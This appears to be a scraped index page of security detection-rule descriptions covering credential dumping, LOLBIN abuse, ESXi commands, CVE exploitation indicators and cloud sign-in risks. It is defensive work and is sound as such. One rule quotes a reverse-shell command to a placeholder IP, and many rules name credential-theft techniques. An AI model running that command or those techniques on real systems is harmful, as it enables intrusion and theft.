DarkGate Downloader

Read More

Detects disabling of Multi Factor Authentication.

Read More

Detects the addition of a new Federated Domain.

Read More

Detects the addition of a new Federated Domain.

Read More

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

Read More

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

Read More

Detects file access requests to files ending with either the ".hive"/".reg" extension, usally associated with Windows Registry backups.

Read More

Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage

Read More

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function

Read More

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function

Read More

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

Read More

Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.

Read More

Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

Read More

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

Read More

Identifies when an organization doesn't have the proper license for PIM and is out of compliance.

Read More

Identifies when the same privilege role has multiple activations by the same user.

Read More

Identifies when a privilege role can be activated without performing mfa.

Read More

Identifies when a user has been assigned a privilege role and are not using that role.

Read More

Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.

Read More

Identifies when an account hasn't signed in during the past n number of days.

Read More

Identifies an event where there are there are too many accounts assigned the Global Administrator role.

Read More

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges.

Read More

Detects the execution of appcmd.exe that is used to extract credentials from configuration files. IIS application pools can run as different users for security and isolation purposes. When a user is specified for the application pool, their credentials are stored in plaintext in the configuration file.

Read More

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

Read More

Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)

Read More

Indicates user activity that is unusual for the user or consistent with known attack patterns.

Read More

Indicates sign-in from a malicious IP address based on high failure rates.

Read More

Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

Read More

Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft

Read More

Detects when a new identity provider is created for Okta.

Read More

Detects when Okta identifies new activity in the Admin Console.

Read More

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

Read More

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

Read More

Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).

Read More

Detects when a rule has been added to the Windows Firewall exception list

Read More

Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers

Read More

Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.

Read More

Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)

Read More

Detects changes to the ESXi syslog configuration via "esxcli"

Read More

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Read More

Detects a suspicious copy command to or from an Admin share or remote

Read More

Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331

Read More

Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.

Read More

Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.

Read More

Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477

Read More

Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll

Read More

Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID

Read More

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Read More

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Read More

Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.

Read More

Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.

Read More

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

Read More

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

Read More

Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report

Read More

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Read More

Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity

Read More

Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874

Read More

Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.

Read More

Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.

Read More

Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec

Read More

Detects potentially suspicious child processes of WinRAR.exe.

Read More

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

Read More

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

Read More

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

Read More

Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

Read More

Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.

Read More

Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.

Read More

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Read More

Detects a suspicious winrar execution in a folder which is not the default installation folder

Read More

Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.

Read More

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)

Read More

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

Read More

Detects user account creation on ESXi system via esxcli

Read More

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

Read More

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

Read More

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

Read More

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

Read More

Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.

Read More

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

Read More

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

Read More

Detects potential SQL injection attempts via GET requests in access logs.

Read More

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

Read More

Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.

Read More

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

Read More

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

Read More

Indicates that the user's valid credentials have been leaked.

Read More

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

Read More

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

Read More

Indicates that a password spray attack has been successfully performed.

Read More

Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns

Read More

Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.

Read More

Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser

Read More

Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address

Read More

Detects suspicious rules that delete or move messages or folders are set on a user's inbox.

Read More

Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.

Read More

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

Read More

Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet

Read More

Detects path traversal exploitation attempts

Read More

Detects creation of files potentially associated with QakBot initial infection, documented by Adithya Chandra and Sushant Kumar Arya of Trellix in August 2022.

Read More

Looks for network connections from notepad. Inspired by the 2022 Red Canary Threat Detection report.

Read More

Detects attempts to connect via DCOM Endpoints, as used by Impacket DCOMExec. This event will occur on successful or unsuccessful attempts using any of the three DCOMExec -object options.

Read More

Detects attempts to retrieve/dump credentials using the DL_DRSGetNCChanges() method.

Read More

Looks for the execution of svchost without the normal -k parameter. Inspired by the 2022 Red Canary Threat Detection report.

Read More

Detects creation of a local user account using the net command with 'Admin' in the name - this technique is used by Vice Society ransomware gang to create bogus user accounts that attempt to blend in with an administrative user account naming convention.

Read More

Detects process execution of RClone or similar tools used by ransomware operators to exfiltrate data.

Read More

Detects the suspicious child process of calc

Read More

Detects the suspicious command line arguments from potentially-injected versions of explorer or wermgr processes.

Read More

Detects the suspicious child process of regsvr32

Read More

Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.

Read More

Detects activity when a member is added to a security-enabled global group

Read More

Detects activity when a member is removed from a security-enabled global group

Read More

Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall

Read More

Detects activity when a security-enabled global group is deleted

Read More

Detects execution of the IEExec utility to download payloads

Read More

Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

Read More

Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539

Read More

Detects when a all the rules have been deleted from the Windows Defender Firewall configuration

Read More

Detects an issue in apache logs that reports threading related errors

Read More

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Read More

Detects XSS attempts injected via GET requests in access logs

Read More

Detects an installation of a device that is forbidden by the system policy

Read More

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

Read More

Detects when a rule has been modified in the Windows firewall exception list

Read More

Detects attempts of decoding encoded Gzip archives via PowerShell.

Read More

This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.

Read More

Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff

Read More

Detects suspicious interactive bash as a parent to rather uncommon child processes

Read More

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

Read More

Detects possible Java payloads in web access logs

Read More

Detects exploitation attempt using the JNDI-Exploit-Kit

Read More

Detects command line parameters or strings often used by crypto miners

Read More

Detects process connections to a Monero crypto mining pool

Read More

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Read More

Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362

Read More

Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder

Read More

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

Read More

Detects logon events that specify new credentials

Read More

This rule detects suspicious processes with parent images located in the C:\Users\Public folder

Read More

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Read More

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Read More

Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.

Read More

Detects a when net.exe is called with a password in the command line

Read More

Detects command line patterns used by BlackByte ransomware in different operations

Read More

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Read More

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Read More

Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter

Read More

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet

Read More

Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)

Read More

Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory

Read More

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

Read More

Detects potentially suspicious child processes spawned by PowerShell

Read More

Detects inline execution of PowerShell code from a file

Read More

Detects suspicious ways to download files or content using PowerShell

Read More

When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories

Read More

Detects the execution of AdvancedRun utility

Read More

Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts

Read More

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors regularly abuse it to manipulate system processes.

Read More

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

Read More

Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection

Read More

Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client

Read More

Detects the execution of rundll32 with a command line that doesn't contain a .dll file

Read More

Detects SSTI attempts sent via GET requests in access logs

Read More

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

Read More

Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287

Read More

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

Read More

Detects an executable that isn't dropbox but communicates with the Dropbox API

Read More

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

Read More

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.

Read More

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

Read More

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

Read More

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

Read More

Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context

Read More

Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1

Read More

Detects suspicious ways to run Invoke-Execution using IEX alias

Read More

Detects suspicious parent processes that should not have any children or should only have a single possible child program

Read More

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

Read More

Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers

Read More

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

Read More

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

Read More

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags

Read More

Detect use of X509Enrollment

Read More

Detect use of X509Enrollment

Read More

Detects activity when The Windows Defender Firewall service failed to load Group Policy

Read More

Detects scheduled task creation events that include suspicious actions, and is run once at 00:00

Read More

Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.

Read More

Detects Windows executables that writes files with suspicious extensions

Read More

Detects activity when Windows Defender Firewall has been reset to its default configuration

Read More

Detects activity when the settings of the Windows firewall have been changed

Read More

Detects Windows shells and scripting applications that write files to suspicious folders

Read More

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

Read More

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

Read More

Detects the creation of the NSIS System plugin library, indicative of an NSIS script execution.

Read More

Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.

Read More

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

Read More

Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery

Read More

Detects listing of the inodes of the "/" directory to determin if the we are running inside of a container.

Read More

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Read More

Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.

Read More

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".

Read More

Detecting the registry change that would prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

Read More

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

Read More

Detects usage of cmdkey to look for cached credentials on the system

Read More

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

Read More

Detects potential C2 communication related to Devil Bait malware

Read More

Detect powershell download and load assembly

Read More

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Read More

Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware

Read More

Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.

Read More

Detects attempts to create and add an account to the admin group via "dscl"

Read More

Detects attempts to create and add an account to the admin group via "sysadminctl"

Read More

Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.

Read More